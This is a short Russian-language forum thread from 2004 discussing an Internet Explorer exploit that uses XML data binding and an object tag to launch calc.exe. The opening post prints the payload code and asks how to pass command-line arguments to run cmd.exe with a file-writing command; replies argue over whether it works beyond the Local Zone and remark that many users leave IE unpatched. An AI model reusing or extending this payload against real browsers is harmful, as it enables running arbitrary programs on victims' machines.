Всем известен кусок кода, запускающий калькулятор: <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security><exploit><![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/WINDOWS/calc.exe"></object> ]]></exploit></security> </xml> Вопросик:Как ещё передать параметры командной строки?Не выходит, ну например запустить cmd.exe с параметром echo aaa>1.txt???
какой смысл в этом эксплойте, если он катит только в Локальной Зоне??? к тамуже есть способ намного компактнее!
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (zFailure @ июня 28 2004,21:52)</td></tr><tr><td id="QUOTE">какой смысл в этом эксплойте, если он катит только в Локальной Зоне??? [/QUOTE]<span id='postcolor'> Вовсе нет, этот катил и в глобальной зоне (по кр. мере раньше).
сам проверил ради интереса на локалоном сервере так действительно запускается C:\Apache Group\Apache2\htdocs\exploits\0001\1.html так уже нет http://a/exploits/0001/1.html вывод - работает только в локально зоне правда далеко не все ставят последние патчи на свой IE =)
